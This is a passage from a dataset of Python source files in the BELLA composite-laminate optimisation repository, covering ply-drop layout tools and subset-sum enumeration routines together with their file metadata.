ply_queue_ini[:]\r\n\r\n lampamA = calc_lampamA_ply_queue(ss, n_plies, ply_queue, constraints)\r\n objA = sum(in_plane_coeffs * ((lampamA - lampam_target[0:4]) ** 2))\r\n# print('objA', objA)\r\n\r\n ss_list = [np.copy(ss)]\r\n ply_queue_list = [ply_queue[:]]\r\n lampamA_list = [lampamA]\r\n objA_list = [objA]\r\n\r\n indices_1, indices_per_angle = calc_ind_plies(\r\n ss, n_plies, ply_queue, constraints, p_A)\r\n indices_to_sort = list(indices_1)\r\n indices_to_sort.insert(0, -1)\r\n# print('indices_1', list(indices_1))\r\n# print('indices_per_angle', list(indices_per_angle))\r\n# print('indices_to_sort', indices_to_sort)\r\n\r\n lampamA_options = calc_lampamA_options_3(n_plies, constraints)\r\n objA_options = calc_objA_options_3(\r\n lampamA, lampamA_options, lampam_target, constraints, in_plane_coeffs)\r\n# print('objA_options', objA_options)\r\n\r\n while np.min(objA_options) + 1e-20 < objA and objA > 1e-10:\r\n # attempts at modifying a couple of angled plies\r\n ind_angle1, ind_angle2 = np.unravel_index(\r\n np.argmin(objA_options, axis=None), objA_options.shape)\r\n angle1 = constraints.set_of_angles[ind_angle1]\r\n angle2 = constraints.set_of_angles[ind_angle2]\r\n# print('test angle1', angle1, 'to angle2', angle2)\r\n# print('ind_angle1', ind_angle1, 'ind_angle2', ind_angle2)\r\n# print('indices_per_angle', indices_per_angle)\r\n\r\n # if no ply to be deleted\r\n if len(indices_per_angle[ind_angle1]) < 1:\r\n objA_options[ind_angle1, ind_angle2] = 1e10\r\n continue\r\n\r\n # attention to not break the 10% rule\r\n LPs = lampamA + lampamA_options[ind_angle2] \\\r\n - lampamA_options[ind_angle1]\r\n if calc_distance_Abdalla(LPs, constraints) > 1e-10:\r\n objA_options[ind_angle1, ind_angle2] = 1e10\r\n continue\r\n\r\n# print(angle1, ' plies changed into ', angle2, 'plies')\r\n# print('ind_angle1', ind_angle1, 'ind_angle2', 
ind_angle2)\r\n# print('indices_per_angle[ind_angle1]', indices_per_angle[ind_angle1])\r\n# print('indices_per_angle[ind_angle2]', indices_per_angle[ind_angle2])\r\n\r\n lampamA = LPs\r\n objA = objA_options[ind_angle1, ind_angle2]\r\n\r\n # modification of the stacking sequence\r\n ind_ply_1 = indices_per_angle[ind_angle1].pop(0)\r\n# print('ind_ply_1', ind_ply_1)\r\n\r\n if ind_ply_1 == 6666: # ply from the queue\r\n ply_queue.remove(angle1)\r\n ply_queue.append(angle2)\r\n else:\r\n ss[ind_ply_1] = angle2\r\n if constraints.sym:\r\n ss[ss.size - ind_ply_1 - 1] = ss[ind_ply_1]\r\n\r\n ss_list.insert(0, np.copy(ss))\r\n ply_queue_list.insert(0, ply_queue[:])\r\n lampamA_list.insert(0, np.copy(lampamA))\r\n objA_list.insert(0, objA)\r\n\r\n indices_per_angle[ind_angle2].append(ind_ply_1)\r\n if constraints.sym:\r\n indices_per_angle[ind_angle2].sort(reverse=True)\r\n else:\r\n sortAccording(indices_per_angle[ind_angle2], indices_to_sort)\r\n indices_per_angle[ind_angle2].reverse()\r\n\r\n# print('indices_per_angle', indices_per_angle)\r\n# print('objA', objA)\r\n if objA < 1e-10:\r\n break\r\n\r\n objA_options = calc_objA_options_3(\r\n lampamA, lampamA_options, lampam_target, constraints,\r\n in_plane_coeffs)\r\n# print('objA_options', objA_options)\r\n\r\n return ss_list, ply_queue_list, lampamA_list, objA_list\r\n\r\n\r\n"
},
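Editor's note (added): the membrane repair in the record above is a greedy descent: at each step it scores every candidate ply-angle change, discards those that would break the 10% rule, applies the best remaining move, and stops once no move improves the in-plane objective. A stripped-down sketch of that control flow on a generic objective (greedy_descent and all of its arguments are illustrative names):

def greedy_descent(x, moves, objective, is_admissible, tol=1e-10):
    """Apply the best admissible move until none improves the objective.

    Mirrors the loop of repair_membrane_1_no_ipo_Abdalla: score all
    moves, skip inadmissible ones, take the best, repeat; like the
    source, newer solutions are inserted at the front of the history.
    """
    history = [x]
    while True:
        best_x, best_obj = None, objective(x) - tol
        for move in moves:
            candidate = move(x)
            if not is_admissible(candidate):
                continue  # plays the role of the 10% rule check
            if objective(candidate) < best_obj:
                best_x, best_obj = candidate, objective(candidate)
        if best_x is None:
            return history  # no improving admissible move remains
        x = best_x
        history.insert(0, x)

# Toy run: minimise (x - 3)^2 with unit steps, x constrained to [0, 5].
hist = greedy_descent(0, [lambda x: x + 1, lambda x: x - 1],
                      lambda x: (x - 3) ** 2, lambda x: 0 <= x <= 5)
print(hist[0])  # 3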
{
"alpha_fraction": 0.5005147457122803,
"alphanum_fraction": 0.517758309841156,
"avg_line_length": 39.00791549682617,
"blob_id": "76a5f2a125a25d42db8e54e030bbedeeded5c834",
"content_id": "adea881c4f1b195ef578db8e93340c132f0ff994",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 15542,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 379,
"path": "/src/BELLA/pdl_tools.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nFunctions used to generate manufacturable ply drop layouts with guide-based\r\nblending\r\n\r\n- format_ply_drops and format_ply_drops2\r\n format the ply drop layouts\r\n\r\n- ply_drops_rules\r\n deletes the ply drop layouts that does not satisfy the ply drop guidelines\r\n\r\n- global_pdl_from_local_pdl\r\n combines group ply drop layouts to form the ply drop layouts of an entire\r\n laminate structure\r\n\r\n- input_pdl_from_sst\r\n recovers the ply drop layout based on a stacking sequence table\r\n\r\nGuidelines:\r\n1: The first two outer plies should not be stopped\r\n2: The number of ply drops should be minimal (not butt joints)\r\n3: The ply drops should be distributed as evenly as possible along the\r\n thickness of the laminates\r\n4: If this is not exactly possible the ply drops should rather be\r\n concentrated in the larger groups (because smaller groups have a\r\n smaller design space)\r\n5: Then ply drops away from the middle plane are prefered to limit fibre\r\n waviness\r\n\"\"\"\r\nimport sys\r\nimport numpy as np\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.guidelines.ply_drop_spacing import calc_penalty_spacing_1ss\r\n\r\n\r\ndef ply_drops_at_each_boundaries(\r\n new_pdl, n_ply_drops_unique, indices_unique, n_ply_drops):\r\n \"\"\"\r\n formats the ply drop layout:\r\n - Initially, the ply drop layout is formatted for each number of ply\r\n drops\r\n - Then, the ply drop layout is formatted for each panel boundary\r\n \"\"\"\r\n pdl = np.zeros((n_ply_drops.size, new_pdl.shape[1]), int)\r\n for line in range(pdl.shape[0]):\r\n pdl[line] = new_pdl[indices_unique[n_ply_drops[line]]]\r\n return pdl\r\n\r\n\r\ndef ply_drops_rules(\r\n pdl,\r\n min_drop,\r\n boundaries,\r\n pdl_before=None,\r\n pdl_after=None,\r\n pdl_spacing=False):\r\n \"\"\"\r\n deletes the ply drop layouts that does not satisfy the ply drop spacing and\r\n stacking rules.\r\n\r\n INPUTS\r\n\r\n - pdl: matrix of ply drop layouts of the current group\r\n - pdl_spacing to activate the ply drop spacing rule\r\n - pdl_before: matrix of ply drop layout of the previous group\r\n - pdl_after: matrix of ply drop layout of the group placed afterwards\r\n - min_drop: minimum number of continuous plies required between two block\r\n of dropped plies\r\n - boundaries: panels connectivity matrix, each row of the array stores the\r\n indices of two adjacent panels\r\n \"\"\"\r\n if pdl_before is None:\r\n pdl_before = np.ones((pdl.shape[1],1))\r\n if pdl_after is None:\r\n pdl_after = np.ones((pdl.shape[1], 1))\r\n\r\n pdl_to_keep = np.ones((pdl.shape[0],), dtype=bool)\r\n# print('pdl_before', pdl_before)\r\n# print('pdl_after', pdl_after)\r\n if pdl_spacing:\r\n for ind_pdl in range(pdl.shape[0]):\r\n for ii1, ii2 in boundaries:\r\n # stack the ply drop layouts before/current/after\r\n layout1 = np.hstack((pdl_before[ii1],\r\n pdl[ind_pdl, ii1],\r\n pdl_after[ii1]))\r\n layout2 = np.hstack((pdl_before[ii2],\r\n pdl[ind_pdl, ii2],\r\n pdl_after[ii2]))\r\n # delete plies that does not cover none of the two adjacent\r\n # panels\r\n to_keep = [layout1[ii] >= 0 \\\r\n or layout1[ii] != layout2[ii] \\\r\n for ii in range(layout1.size)]\r\n layout1 = layout1[to_keep]\r\n layout2 = layout2[to_keep]\r\n # check if the ply drop spacing rule is verified\r\n if pdl_spacing:\r\n if calc_penalty_spacing_1ss(layout1, min_drop) \\\r\n + calc_penalty_spacing_1ss(layout2, min_drop) > 0:\r\n pdl_to_keep[ind_pdl] = False\r\n break\r\n return pdl[pdl_to_keep]\r\n\r\n\r\ndef 
format_ply_drops(my_list, n_max):\r\n \"\"\"\r\n formats the matrix of ply drop layout 'my_list' so that each panel is\r\n described with a list of 'n_max' numbers such as for the thickest panel:\r\n pdl_final = [0, 1, 2, 3, ..., n_max - 1]\r\n and for another thinner panel:\r\n - if a ply of index in the thicker panel belongs to the thinner panel:\r\n pdl_final[index] = index\r\n - otherwise:\r\n pdl_final[index] = -1\r\n \"\"\"\r\n result = np.matlib.repmat(np.arange(n_max), len(my_list), 1)\r\n for index1, el1 in enumerate(my_list):\r\n for el2 in el1:\r\n result[index1, el2] = -1\r\n return result\r\n\r\n\r\ndef format_ply_drops2(ss):\r\n \"\"\"\r\n formats the matrix of ply drop layout 'my_list' so that each panel is\r\n described with a list of 'n_max' numbers such as for the thickest panel:\r\n pdl_final = [0, 1, 2, 3, ..., n_max - 1]\r\n and for another thinner panel:\r\n - if a ply of index in the thicker panel belongs to the thinner panel:\r\n pdl_final[index] = number of the plies stacked on the panel\r\n - otherwise:\r\n pdl_final[index] = -1\r\n \"\"\"\r\n for ind_panel in range(ss.shape[0]):\r\n index_plyLocal = 0\r\n for index_plyGlobal in range(ss.shape[1]):\r\n if ss[ind_panel, index_plyGlobal] != -1:\r\n ss[ind_panel, index_plyGlobal] = index_plyLocal\r\n index_plyLocal += 1\r\n return ss\r\n\r\n\r\ndef global_pdl_from_local_pdl(multipanel, sym, pdl_before_cummul,\r\n pdl_after_cummul=None):\r\n \"\"\"\r\n combines group ply drop layouts to form the ply drop layouts of an entire\r\n laminate structure\r\n\r\n INPUTS\r\n multipanel: multi-panel structure\r\n sym for a symmetric panel\r\n pdl_before_cummul and pdl_after_cummul: array of the ply drop layouts for\r\n the successive groups\r\n \"\"\"\r\n# print('pdl_before_cummul')\r\n# print(pdl_before_cummul[0].shape, pdl_before_cummul[1].shape)\r\n# print('pdl_after_cummul')\r\n# print(pdl_after_cummul)\r\n # assemble the pdl with -1 for ply drops and 1 for non-dropped plies\r\n pdl = [None]*(multipanel.reduced.n_panels)\r\n for ind_panel in range(multipanel.reduced.n_panels):\r\n pdl[ind_panel] = np.array([], dtype=int)\r\n if sym: # for symmetric laminates\r\n for ind_panel in range(multipanel.reduced.n_panels):\r\n index_in_ss = 0\r\n for local_pdl in pdl_before_cummul:\r\n if local_pdl is not None:\r\n for index_ply \\\r\n in range(local_pdl[ind_panel].size):\r\n if local_pdl[ind_panel][index_ply] == -1:\r\n pdl[ind_panel] = np.hstack((\r\n pdl[ind_panel],\r\n np.array([-1]).astype(int)))\r\n else:\r\n pdl[ind_panel] = np.hstack((\r\n pdl[ind_panel],\r\n np.array([1]).astype(int)))\r\n index_in_ss += 1\r\n# if multipanel.has_middle_ply:\r\n# if multipanel.middle_ply[ind_panel]:\r\n# pdl[ind_panel] = np.hstack((\r\n# pdl[ind_panel],\r\n# np.array([1]).astype(int)))\r\n# else:\r\n# pdl[ind_panel] = np.hstack((\r\n# pdl[ind_panel],\r\n# np.array([-1]).astype(int)))\r\n pdl[ind_panel] = np.hstack((\r\n pdl[ind_panel], np.flip(pdl[ind_panel], axis=0)))\r\n pdl = np.array(pdl)\r\n if multipanel.has_middle_ply:\r\n pdl = np.delete(pdl, np.s_[pdl.shape[1] // 2], axis=1)\r\n else: # for asymmetric laminates\r\n pdl_end = [None]*(multipanel.reduced.n_panels)\r\n for ind_panel in range(multipanel.reduced.n_panels):\r\n pdl_end[ind_panel] = np.array([], dtype=int)\r\n for ind_panel in range(multipanel.reduced.n_panels):\r\n index_in_ss = 0\r\n index_in_ss_end = 1\r\n for ind_local_pdl, local_pdl in enumerate(pdl_before_cummul):\r\n if ind_local_pdl % 2 == 0 and pdl_before_cummul \\\r\n and local_pdl is not None:\r\n for index_ply 
in range(local_pdl[ind_panel].size):\r\n if pdl_before_cummul[\r\n ind_local_pdl][ind_panel][index_ply] == -1:\r\n pdl[ind_panel] = np.hstack((\r\n pdl[ind_panel],\r\n np.array([-1]).astype(int)))\r\n else:\r\n pdl[ind_panel] = np.hstack((\r\n pdl[ind_panel],\r\n np.array([1]).astype(int)))\r\n index_in_ss += 1\r\n elif ind_local_pdl % 2 == 1 and pdl_after_cummul \\\r\n and pdl_after_cummul[ind_local_pdl] is not None:\r\n for index_ply in range(pdl_after_cummul[\r\n ind_local_pdl][ind_panel].size)[::-1]:\r\n if pdl_after_cummul[\r\n ind_local_pdl][ind_panel][index_ply] == -1:\r\n pdl_end[ind_panel] = np.hstack((\r\n np.array([-1]).astype(int),\r\n pdl_end[ind_panel]))\r\n else:\r\n pdl_end[ind_panel] = np.hstack((\r\n np.array([1]).astype(int),\r\n pdl_end[ind_panel]))\r\n index_in_ss_end += 1\r\n pdl[ind_panel] = np.hstack((\r\n pdl[ind_panel], pdl_end[ind_panel]))\r\n pdl = np.array(pdl)\r\n# print('pdl', pdl)\r\n # value for the non-dropped plies changed to the position of the plies\r\n if sym: # for symmetric laminates\r\n for ind_panel in range(multipanel.reduced.n_panels):\r\n to_add = 0\r\n for ind_ply in range(pdl.shape[1]):\r\n if pdl[ind_panel, ind_ply] != -1:\r\n pdl[ind_panel, ind_ply] += to_add\r\n to_add += 1\r\n pdl[:, (pdl.shape[1] + 1)//2:] \\\r\n = np.flip(pdl[:, :pdl.shape[1] // 2], axis=1)\r\n else: # for asymmetric laminates\r\n for ind_panel in range(multipanel.reduced.n_panels):\r\n to_add = 0\r\n for ind_ply in range(pdl.shape[1]):\r\n if pdl[ind_panel, ind_ply] != -1:\r\n pdl[ind_panel, ind_ply] += to_add\r\n to_add += 1\r\n if pdl.shape[1] != multipanel.n_plies_max \\\r\n and pdl.shape[1] != multipanel.n_plies_max + 1:\r\n print('pdl.shape', pdl.shape)\r\n raise Exception('This should not happen')\r\n return pdl\r\n\r\n\r\ndef input_pdl_from_sst(sst, multipanel, constraints):\r\n \"\"\"\r\n recovers the ply drop layout baed on a stacking sequence table\r\n \"\"\"\r\n sst_to_mod = np.copy(sst)\r\n\r\n if constraints.sym:\r\n pdl_before_cummul = [None] * 2\r\n for index_pdl in range(len(pdl_before_cummul)):\r\n pdl_before_cummul[index_pdl] = None\r\n\r\n if constraints.n_covering == 1:\r\n pdl_before_cummul[0] = np.matlib.repmat(\r\n np.array([0], dtype=int), multipanel.n_panels, 1)\r\n sst_to_mod = sst_to_mod[:, 1:sst.shape[1] // 2]\r\n elif constraints.n_covering == 2:\r\n pdl_before_cummul[0] = np.matlib.repmat(\r\n np.array([0, 1], dtype=int), multipanel.n_panels, 1)\r\n sst_to_mod = sst_to_mod[:, 2:sst.shape[1] // 2]\r\n else:\r\n sst_to_mod = sst_to_mod[:, :sst.shape[1] // 2]\r\n\r\n for ind_panel in range(sst_to_mod.shape[0]):\r\n counter = 0\r\n for ind_angle in range(sst_to_mod.shape[1]):\r\n if sst_to_mod[ind_panel, ind_angle] != - 1:\r\n sst_to_mod[ind_panel, ind_angle] = counter\r\n counter += 1\r\n\r\n pdl_before_cummul[1] = sst_to_mod\r\n\r\n my_pdl = global_pdl_from_local_pdl(\r\n multipanel, constraints.sym, pdl_before_cummul)\r\n return(my_pdl, pdl_before_cummul)\r\n\r\n pdl_before_cummul = [None] * 3\r\n pdl_after_cummul = [None] * 3\r\n for index_pdl in range(len(pdl_before_cummul)):\r\n pdl_before_cummul[index_pdl] = None\r\n pdl_after_cummul[index_pdl] = None\r\n\r\n if constraints.n_covering == 1:\r\n pdl_before_cummul[0] = np.matlib.repmat(\r\n np.array([0], dtype=int), multipanel.n_panels, 1)\r\n pdl_after_cummul[1] = np.matlib.repmat(\r\n np.array([0], dtype=int), multipanel.n_panels, 1)\r\n sst_to_mod = sst_to_mod[:, 1:-1]\r\n elif constraints.n_covering == 2:\r\n pdl_before_cummul[0] = np.matlib.repmat(\r\n np.array([0, 1], dtype=int), 
multipanel.n_panels, 1)\r\n pdl_after_cummul[1] = np.matlib.repmat(\r\n np.array([0, 1], dtype=int), multipanel.n_panels, 1)\r\n sst_to_mod = sst_to_mod[:, 2:-2]\r\n\r\n for ind_panel in range(sst_to_mod.shape[0]):\r\n counter = 0\r\n for ind_angle in range(sst_to_mod.shape[1]):\r\n if sst_to_mod[ind_panel, ind_angle] != - 1:\r\n sst_to_mod[ind_panel, ind_angle] = counter\r\n counter += 1\r\n\r\n pdl_before_cummul[2] = sst_to_mod\r\n\r\n my_pdl = global_pdl_from_local_pdl(\r\n multipanel, constraints.sym, pdl_before_cummul, pdl_after_cummul)\r\n return(my_pdl, pdl_before_cummul, pdl_after_cummul)\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print('\\n*** Test for the function format_ply_drops ***')\r\n# print('Input list:\\n')\r\n# my_list = ((), (0, 1), (0, 1, 2))\r\n# print(my_list, '\\n')\r\n# print('Input for the maximum number of plies for the group:\\n')\r\n# n_max = 5\r\n# print(n_max, '\\n')\r\n# print('output:\\n')\r\n# print(format_ply_drops(my_list, n_max))\r\n\r\n print('\\n*** Test for the function format_ply_drops2 ***')\r\n# print('Input array:\\n')\r\n# ss = np.array([[0, 1, 2, 3, 4],\r\n# [-1, -1, 2, 3, 4],\r\n# [-1, 1, -1, 3, -1]])\r\n# print(ss, '\\n')\r\n# print('output:\\n')\r\n# print(format_ply_drops2(ss))\r\n\r\n print('\\n*** Test for the function ply_drops_rules ***')\r\n# print('Input ply drop layouts:\\n')\r\n# pdl = np.array([[[0, 1, 2, 3, 4, 5],\r\n# [-1, -1, 2, -1, 4, 5]],\r\n# [[0, 1, 2, 3, 4, 5],\r\n# [0, -1, 2, 3, -1, -1]],\r\n# [[0, 1, 2, 3, 4, 5],\r\n# [-1, 2, -1, -1, 4, 5]]], dtype=int)\r\n# pdl_before = np.array([[0, -1, 2, 3, 4],\r\n# [0, -1, 2, 3, 1]])\r\n# pdl_after = None\r\n# min_drop = 2\r\n# boundaries = np.array([[0, 1]])\r\n# print(pdl, '\\n')\r\n# print('Input ply drop layout of the previous group:\\n')\r\n# print(pdl_before, '\\n')\r\n# print('Input ply drop layout of the next group:\\n')\r\n# print(pdl_after, '\\n')\r\n# print(f'MinDrop = {min_drop}\\n')\r\n# print('output:\\n')\r\n# print(ply_drops_rules(\r\n# pdl, pdl_before, pdl_after, min_drop,boundaries,\r\n# pdl_spacing=False))\r\n\r\n print('\\n*** Test for the function ply_drops_at_each_boundaries ***')\r\n# new_pdl = np.array([[ 0, 1, 2, 3, 4, 5],\r\n# [-1, 1, 2, 3, 4, 5],\r\n# [ 0, 1, -1, -1, 4, 5]])\r\n# n_ply_drops_unique = np.array([0, 1, 2])\r\n# indices_unique = {0: 0, 1: 1, 2: 2}\r\n# n_ply_drops = np.array([0, 1, 2, 1])\r\n# print(ply_drops_at_each_boundaries\r\n# (new_pdl, n_ply_drops_unique, indices_unique, n_ply_drops))\r\n"
},
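Editor's note (added): throughout pdl_tools above, a ply-drop layout encodes each panel against the guide laminate as a vector of ply indices in which dropped plies are marked -1. The file calls np.matlib.repmat while importing only numpy as np, so that attribute resolves only if numpy.matlib was already imported elsewhere in the process. The sketch below re-implements format_ply_drops with np.tile, which needs no extra import, and reproduces the commented-out test at the bottom of the file:

import numpy as np

def format_ply_drops(drop_lists, n_max):
    """Row i holds the guide indices 0..n_max-1 with the dropped-ply
    positions listed in drop_lists[i] overwritten by -1 (same behaviour
    as format_ply_drops above, minus the numpy.matlib dependency)."""
    result = np.tile(np.arange(n_max), (len(drop_lists), 1))
    for row, drops in enumerate(drop_lists):
        for ply in drops:
            result[row, ply] = -1
    return result

# Thickest panel keeps every ply; thinner panels drop plies {0,1} and {0,1,2}.
print(format_ply_drops(((), (0, 1), (0, 1, 2)), 5))
# [[ 0  1  2  3  4]
#  [-1 -1  2  3  4]
#  [-1 -1 -1  3  4]]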
{
"alpha_fraction": 0.432465523481369,
"alphanum_fraction": 0.4852052330970764,
"avg_line_length": 19.413705825805664,
"blob_id": "a2761dfb91ee74f5f3ed1d00c58e0361e4055049",
"content_id": "5fc0e912e9c3d5ae65fb47c8b857211ad6ba9180",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 25313,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 1182,
"path": "/src/divers/subset_sum.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python\r\n#\r\ndef backup_one ( n, u, told ):\r\n\r\n#*****************************************************************************80\r\n#\r\n## BACKUP_ONE seeks the last 1 in the subarray U(1:TOLD-1).\r\n#\r\n# Licensing:\r\n#\r\n# I don't care what you do with this code.\r\n#\r\n# Modified:\r\n#\r\n# 16 July 2017\r\n#\r\n# Author:\r\n#\r\n# John Burkardt\r\n#\r\n# Parameters:\r\n#\r\n# Input, integer N, the full size of the U array.\r\n#\r\n# Input, integer U(N), the array to be checked.\r\n#\r\n# Input, integer TOLD, a value between 1 and N; entries TOLD\r\n# through N are to be ignored.\r\n#\r\n# Output, integer T, the highest index in U, between 0 and TOLD-1,\r\n# for which U is 1. If no such value is found, T is -1.\r\n#\r\n t = -1\r\n\r\n for i in range ( told - 1, -1, -1 ):\r\n if ( u[i] == 1 ):\r\n t = i;\r\n break\r\n\r\n return t\r\n\r\ndef subset_next ( n, t, rank ):\r\n\r\n#*****************************************************************************80\r\n#\r\n## SUBSET_NEXT computes the subset lexicographic successor.\r\n#\r\n# Discussion:\r\n#\r\n# This is a lightly modified version of \"subset_lex_successor()\" from COMBO.\r\n#\r\n# Example:\r\n#\r\n# On initial call, N is 5 and the input value of RANK is -1.\r\n# Then here are the successive outputs from the program:\r\n#\r\n# Rank T1 T2 T3 T4 T5\r\n# ---- -- -- -- -- --\r\n# 0 0 0 0 0 0\r\n# 1 0 0 0 0 1\r\n# 2 0 0 0 1 0\r\n# 3 0 0 0 1 1\r\n# .. .. .. .. .. ..\r\n# 30 1 1 1 1 0\r\n# 31 1 1 1 1 1\r\n# -1 0 0 0 0 0 <-- Reached end of cycle.\r\n#\r\n# Licensing:\r\n#\r\n# I don't care what you do with this code.\r\n#\r\n# Modified:\r\n#\r\n# 09 November 2015\r\n#\r\n# Author:\r\n#\r\n# John Burkardt\r\n#\r\n# Reference:\r\n#\r\n# Donald Kreher, Douglas Simpson,\r\n# Combinatorial Algorithms,\r\n# CRC Press, 1998,\r\n# ISBN: 0-8493-3988-X,\r\n# LC: QA164.K73.\r\n#\r\n# Parameters:\r\n#\r\n# Input, integer N, the number of elements in the master set.\r\n# N must be positive.\r\n#\r\n# Input/output, bool T(N), describes a subset. 
T(I) is False if\r\n# the I-th element of the master set is not in the subset, and is\r\n# True if the I-th element is part of the subset.\r\n# On input, T describes a subset.\r\n# On output, T describes the next subset in the ordering.\r\n#\r\n# Input/output, integer RANK, the rank.\r\n# If RANK = -1 on input, then the routine understands that this is\r\n# the first call, and that the user wishes the routine to supply\r\n# the first element in the ordering, which has RANK = 0.\r\n# In general, the input value of RANK is increased by 1 for output,\r\n# unless the very last element of the ordering was input, in which\r\n# case the output value of RANK is -1.\r\n#\r\n\r\n#\r\n# Return the first element.\r\n#\r\n if ( rank == -1 ):\r\n rank = 0\r\n return t, rank\r\n\r\n for i in range ( n - 1, -1, -1 ):\r\n\r\n if ( not t[i] ):\r\n t[i] = True;\r\n rank = rank + 1;\r\n return t, rank\r\n\r\n t[i] = False\r\n\r\n rank = -1\r\n\r\n return t, rank\r\n\r\ndef subset_next_test ( ):\r\n\r\n#*****************************************************************************80\r\n#\r\n## SUBSET_NEXT_TEST tests SUBSET_NEXT.\r\n#\r\n# Licensing:\r\n#\r\n# I don't care what you do with this code.\r\n#\r\n# Modified:\r\n#\r\n# 10 November 2015\r\n#\r\n# Author:\r\n#\r\n# John Burkardt\r\n#\r\n import numpy as np\r\n import platform\r\n\r\n print ( '' )\r\n print ( 'SUBSET_NEXT_TEST' )\r\n print ( ' Python version: %s' % ( platform.python_version ( ) ) )\r\n print ( ' SUBSET_NEXT generates all subsets of an N set.' )\r\n\r\n print ( '' )\r\n n = 5\r\n t = np.zeros ( n, dtype = np.bool )\r\n rank = -1\r\n\r\n while ( True ):\r\n\r\n t, rank = subset_next ( n, t, rank )\r\n\r\n if ( rank == -1 ):\r\n break\r\n\r\n k = 0\r\n\r\n for i in range ( 0, n ):\r\n\r\n if ( t[i] ):\r\n k = k + 1\r\n print ( ' %d' % ( i ) ),\r\n\r\n if ( k == 0 ):\r\n print ( ' (empty set)' ),\r\n\r\n print ( '' )\r\n#\r\n# Terminate.\r\n#\r\n print ( '' )\r\n print ( 'SUBSET_NEXT_TEST:' )\r\n print ( ' Normal end of execution.' 
)\r\n return\r\n\r\ndef subset_sum_count ( n, w, t ):\r\n\r\n#*****************************************************************************80\r\n#\r\n## SUBSET_SUM_COUNT counts solutions to the subset sum problem in a given range.\r\n#\r\n# Licensing:\r\n#\r\n# I don't care what you do with this code.\r\n#\r\n# Modified:\r\n#\r\n# 10 November 2015\r\n#\r\n# Author:\r\n#\r\n# John Burkardt\r\n#\r\n# Parameters:\r\n#\r\n# Input, integer N, the number of weights.\r\n#\r\n# Input, integer W(N), a set of weights.\r\n#\r\n# Input, integer T, the target value.\r\n#\r\n# Output, integer COUNT, the number of solutions found in this range.\r\n#\r\n import numpy as np\r\n from sys import exit\r\n\r\n count = 0\r\n\r\n s = np.zeros ( n, dtype = np.bool )\r\n rank = -1\r\n\r\n while ( True ):\r\n\r\n s, rank = subset_next ( n, s, rank )\r\n\r\n if ( rank == -1 ):\r\n break\r\n\r\n t2 = 0\r\n for i in range ( 0, n ):\r\n if ( s[i] ):\r\n t2 = t2 + w[i]\r\n\r\n if ( t2 == t ):\r\n count = count + 1\r\n\r\n return count\r\n\r\ndef subset_sum_count_test ( n, w, t ):\r\n\r\n#*****************************************************************************80\r\n#\r\n## SUBSET_SUM_COUNT_TEST tests SUBSET_SUM_COUNT.\r\n#\r\n# Licensing:\r\n#\r\n# I don't care what you do with this code.\r\n#\r\n# Modified:\r\n#\r\n# 09 November 2015\r\n#\r\n# Author:\r\n#\r\n# John Burkardt\r\n#\r\n# Parameters:\r\n#\r\n# Input, integer N, the number of weights.\r\n#\r\n# Input, integer W(N), a set of weights.\r\n#\r\n# Input, integer T, the target value.\r\n#\r\n# Input, integer R(2), the lower and upper limits to be searched.\r\n# If this argument is omitted, the entire range, [0, 2^N-1 ] will\r\n# be searched.\r\n#\r\n print ( '' )\r\n print ( 'SUBSET_SUM_COUNT_TEST:' )\r\n print ( ' SUBSET_SUM_COUNT counts solutions to the subset sum problem.' )\r\n print ( '' )\r\n print ( ' Seek a subset of W that sums to T.' )\r\n print ( '' )\r\n print ( ' Target value T = %d' % ( t ) )\r\n print ( '' )\r\n print ( ' I W(I)' )\r\n print ( '' )\r\n for i in range ( 0, n ):\r\n print ( ' %2d %8d' % ( i, w[i] ) )\r\n\r\n count = subset_sum_count ( n, w, t )\r\n\r\n print ( '' )\r\n print ( ' Number of solutions is %d.' % ( count ) )\r\n\r\n return count\r\n\r\ndef subset_sum_count_tests ( ):\r\n\r\n#*****************************************************************************80\r\n#\r\n## SUBSET_SUM_COUNT_TESTS tests SUBSET_SUM_COUNT_TEST.\r\n#\r\n# Licensing:\r\n#\r\n# I don't care what you do with this code.\r\n#\r\n# Modified:\r\n#\r\n# 10 November 2015\r\n#\r\n# Author:\r\n#\r\n# John Burkardt\r\n#\r\n import numpy as np\r\n import platform\r\n\r\n print ( '' )\r\n print ( 'SUBSET_SUM_COUNT_TESTS:' )\r\n print ( ' Python version: %s' % ( platform.python_version ( ) ) )\r\n print ( ' SUBSET_SUM_COUNT_TEST calls SUBSET_SUM_COUNT with a' )\r\n print ( ' particular set of weights and target.' 
)\r\n#\r\n# Problem #1.\r\n#\r\n n = 8\r\n w = np.array ( [ 15, 22, 14, 26, 32, 9, 16, 8 ] )\r\n t = 53\r\n count = subset_sum_count_test ( n, w, t )\r\n#\r\n# Problem #2.\r\n#\r\n n = 10\r\n w = np.array ( [ 267, 493, 869, 961, 1000, 1153, 1246, 1598, 1766, 1922 ] )\r\n t = 5842\r\n count = subset_sum_count_test ( n, w, t )\r\n#\r\n# Problem #3.\r\n#\r\n n = 21\r\n w = np.array ( [ \\\r\n 518533, 1037066, 2074132, 1648264, 796528, \\\r\n 1593056, 686112, 1372224, 244448, 488896, \\\r\n 977792, 1955584, 1411168, 322336, 644672, \\\r\n 1289344, 78688, 157376, 314752, 629504, \\\r\n 1259008 ] )\r\n t = 2463098\r\n count = subset_sum_count_test ( n, w, t )\r\n#\r\n# Problem #4.\r\n#\r\n n = 10\r\n w = np.array ( [ 41, 34, 21, 20, 8, 7, 7, 4, 3, 3 ] )\r\n t = 50\r\n count = subset_sum_count_test ( n, w, t )\r\n#\r\n# Problem #5.\r\n#\r\n n = 9\r\n w = np.array ( [ 81, 80, 43, 40, 30, 26, 12, 11, 9 ] )\r\n t = 100\r\n count = subset_sum_count_test ( n, w, t )\r\n#\r\n# Problem #6.\r\n#\r\n n = 6\r\n w = np.array ( [ 1, 2, 4, 8, 16, 32 ] )\r\n t = 22\r\n count = subset_sum_count_test ( n, w, t )\r\n#\r\n# Problem #7.\r\n#\r\n n = 10\r\n w = np.array ( [ 25, 27, 3, 12, 6, 15, 